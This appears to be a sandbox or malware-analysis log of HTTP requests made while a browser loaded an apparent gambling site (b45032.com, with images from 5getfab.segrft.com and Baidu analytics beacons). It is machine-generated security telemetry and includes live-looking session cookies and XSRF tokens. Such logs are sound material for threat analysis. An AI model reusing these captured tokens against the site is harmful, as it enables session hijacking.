Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/fcg/21003.png?ver=1659683708 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/ww3a8wsu4de7c.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/224_egame_icon.png?1736725697344 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/59_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/172_egame_logo.png?ver=1669192658 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/224_egame_logo.png?ver=1711946581 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/159_egame_logo.png?ver=1713931261 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/common/search.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/197_egame_logo.png?ver=1673578619 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1046.png?ver=1611751393 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/89_egame_logo.png?ver=1699847425 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/214_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/187_egame_logo.png?ver=1688355077 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/185_egame_logo.png?ver=1638670083 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/24_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/sky/sw_dhcf.png?ver=1691141966 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/xin/802.png?ver=1664356540 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/224_egame_icon.png?1736725697344 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/jdb/9020.png?ver=1715740152 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/fcg/21003.png?ver=1659683708 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/joker/ww3a8wsu4de7c.png?ver=1673334591 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer_spiler.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/common/bet365_style.css?ver=1684314915Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.js?947ea0365dd8ab01fc51bd9439b42930 HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DDIf-None-Match: 212cb7224b20495fcedcef6081553c65
Source: global trafficHTTP traffic detected: GET /images_plus/footer/en/nav_icons_best.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/common/bet365_style.css?ver=1684314915Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_TreasureBowls.png?ver=1728355170 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_FaFaFortune.png?ver=1728355170 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_wonderWoods.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/89_egame_logo.png?ver=1699847425 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_treasureSkyland.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/214_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/185_egame_logo.png?ver=1638670083 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /member/call-request?check=1 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/224Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IjF1cGRRc2JFTkR2RHpZbUlKbzBlUVE9PSIsInZhbHVlIjoiM1p3NHhoYjZWOExTc3U0ZXFrNnlhZ1pZVmhwMFpKa25oc0VYaDRndFh2ZERZRHNSYWVjM3BoKzY3bWthOXV0WU96a1A5K2NMU2d4ZCtPbmVjTlpJSUE9PSIsIm1hYyI6ImMwNTAzZjhhN2YzNTA0ZGIwZWVlOWQ2ZDVhZGYyY2JiODNmOWQ2MjE3M2ZlMzMwNDI4MDU4MzIzYjhmODY1MmIifQ%3D%3D; vanguard_session=eyJpdiI6IjI1d2hYSTZiOGx4OFpRRTJrS3VwUkE9PSIsInZhbHVlIjoiQWFXM3owbnpZelpaT1MzaUZhRGtFb1gzXC85WFRHTmV5YUVBSlg2TEtoWlkrOGxkNG9ENHlCZmtsOWxuNW1DMUtlOFU1c0hJSkJ2M2VcL29aRWZSSmVDQT09IiwibWFjIjoiMTg5ZGYzZjhlNzY5MmM1YzI2YTQzNDczMjRiOTgxMzljZDRlMmUyM2Q4OTZhMzRkODRiNjQ0NTMzNjdiOGVjYiJ9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/187_egame_logo.png?ver=1688355077 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_treasureHeroes.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_tikiMania.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_stumpyMcDoodles.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_seven7s.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&lt=1736725677&rnd=1903090938&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=2&sn=48208&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2Fegame%2F224&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91 HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_risingRoyals.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/upg/UPG_northStorm.png?ver=1712128601 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/24_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1046.png?ver=1611751393 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/en/nav_icons_best.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer_spiler.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
